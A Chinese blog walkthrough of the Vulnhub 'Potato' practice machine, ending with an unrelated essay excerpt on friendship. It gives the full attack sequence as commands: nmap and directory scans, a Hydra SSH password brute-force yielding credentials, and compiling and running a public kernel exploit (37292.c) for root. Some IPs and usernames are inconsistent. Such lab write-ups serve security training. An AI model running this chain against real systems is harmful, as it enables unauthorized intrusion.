Vulnhub-potato靶机实战

客官°小女子只卖身不卖艺 2023-01-05 12:51 150阅读 0赞

### 文章目录 ###

*   *   *  学习笔记下载
         *  靶机下载
         *  第一部分 信息收集
         *   *  第一步 主机发现
             *  第二步 端口扫描
             *  第三步 访问网站
             *  第四步 扫描目录
             *  第四步 访问扫描出的目录
             *  第五步 回到开放的端口，分析，发现7120开放
         *  第二部分 ssh利用
         *   *  使用Hydra破解ssh
         *  第三部分 提权
         *   *  第一步 查看基本的系统信息
             *  第二步 利用MSF查找可利用的漏洞
             *  第三步 将文件上传到靶机
             *  第四步 查找flag
         *  摘抄

### [学习笔记下载][Link 1] ###

https://download.csdn.net/download/qq_41901122/14122921

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]

### 靶机下载 ###

https://www.vulnhub.com/entry/potato-suncsr-1,556/

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]

### 第一部分 信息收集 ###

#### 第一步 主机发现 ####

arp-scan 192.168.232.0/24

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]

#### 第二步 端口扫描 ####

nmap -P- -sP 192.168.232.188
    nmap -sS -sV -TS -A -P- 192.168.232.188

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]

#### 第三步 访问网站 ####

http://192.168.232.188/

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]

#### 第四步 扫描目录 ####

dirb http://192.168.232.175
    python3 dirmap.py  -i http://192.168.232.175 -lcf

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]

+ http://192.168.232.188/index.html (CODE:200|SIZE:654)                                                                     
    + http://192.168.232.188/info.php (CODE:200|SIZE:87524)                                                                     
    + http://192.168.232.188/server-status (CODE:403|SIZE:295

#### 第四步 访问扫描出的目录 ####

http://192.168.232.188/info.php

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]

#### 第五步 回到开放的端口，分析，发现7120开放 ####

### 第二部分 ssh利用 ###

#### 使用Hydra破解ssh ####

hydra -l potato -P top1000.txt -vV ssh://192.168.232.188:7120
    pomato/letmein

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]

### 第三部分 提权 ###

#### 第一步 查看基本的系统信息 ####

id 
    whoami
    uname -a
    内核版本为Ubuntu 3.13.0

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9]

#### 第二步 利用MSF查找可利用的漏洞 ####

searchsploit Ubuntu 3.13.0
    cp /usr/share/exploitdb/exploits/linux/local/37292.c  /root/Desktop/potato/37292.c

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 10]

#### 第三步 将文件上传到靶机 ####

通过XFTP上传
    gcc 37292.c -o exp
    chmod +x exp
    ./exp

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 11]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 12]

#### 第四步 查找flag ####

cd /root
    ls
    cat proof.txt

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 13]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 14]

SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 15]

### 摘抄 ###

--------------------

**朋友，强求不来。**  
真正的友谊的形成，并非由于双方有意的拉拢，带些偶然，带些不知不觉。  
在意识层底下，不知何年何月潜伏着一个友谊的种子：咦！看它在心面透出了萌芽。  
在温暖固密，春夜一般的潜意识中，忽然偷偷地钻进了一个外人，哦！原来就是他！  
真正友谊的产物，只是一种渗透了你的身心的愉快。  
接触着你真正的朋友，感觉到这种愉快，  
你内心的鄙吝残忍，自然会消失，无需说教似的劝导。  
出自《谈交友》 作者丨钱钟书

--------------------

[Link 1]: https://download.csdn.net/download/qq_41901122/14122921
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221119/3516c25a86a04b3b8a9cc6606bb787be.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221119/0806249b8a2a41c5a9c28e2ba93886f4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221119/89f1437085e44ebb9f50ced3601eba44.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221119/1199696a31644829abd6dd7b747aaebb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221119/ba71fa36ac5747aba19288a6bdd610df.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]: /images/20221119/fad9079acbbb4598aeb7043748223061.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]: /images/20221119/4b016ba9a41f47a0933f0dccaea7cd56.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]: /images/20221119/3bb25127efc44ea9a521bbcfe527e747.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]: /images/20221119/00c244a4c3c0469da14af8091042fae3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9]: /images/20221119/bac41ffbb91742cb8a39df4b07c0c030.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 10]: /images/20221119/76219d1f217e49f3a6ddb97cc9ddb70e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 11]: /images/20221119/4bb42f18c468417798262a3546450713.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 12]: /images/20221119/952e278bbebf48219fcf24fc803e907c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 13]: /images/20221119/ae46b4db3d1e4e6d9b463e6cad6c0888.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 14]: /images/20221119/dcd09b3e418c489c8b4c02052073b8e1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 15]: /images/20221119/eaef513bf35e4adbba263c3d7853707b.png